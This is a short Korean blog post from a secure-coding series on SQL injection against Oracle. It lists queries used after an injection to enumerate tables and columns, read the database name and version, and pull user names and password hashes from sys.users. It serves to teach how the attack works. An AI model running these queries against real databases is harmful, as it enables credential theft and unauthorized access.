Oracle에 대한 SQL 삽입 공격
CODEDRAGON ㆍSecurity/SecureCoding
반응형
Oracle에 대한 SQL 삽입 공격
사용자 정의 테이블 가져오기
SELECT tname FROM sys.tab SELECT table_name FROM all_tables WHERE tablespace_name='USERS' |
컬럼 이름 가져오기
SELECT column_name FROM cols WHERE table_name='column이름을 얻기 원하는 table이름' SELECT column_name FROM all_tab_columns WHERE table_name='table이름' |
현재 데이터베이스 이름 가져오기
SELECT global_name FROM global_name |
사용자와 패스워드 정보 가져오기
SELECT name, password FROM sys.users WHERE type#=1 |
버전 정보 가져오기
SELECT banner || '-' || (SELECT banner FROM v$version WHERE banner LIKE 'Oracle%') FROM v$version WHERE banner LIKE 'TNS%' |
반응형
'Security > SecureCoding' 카테고리의 다른 글
| 세션 처리 및 접근 통제 취약점 (0) | 2015.05.25 |
|---|---|
| DBMS의 특성에 따른 SQL 삽입 공격 (0) | 2015.05.18 |
| Microsoft SQL Server에 대한 SQL 삽입 공격 (0) | 2015.05.05 |
| SQL의 분류 (0) | 2015.04.12 |
| SQL Injection, SQL 삽입 공격 (0) | 2015.04.04 |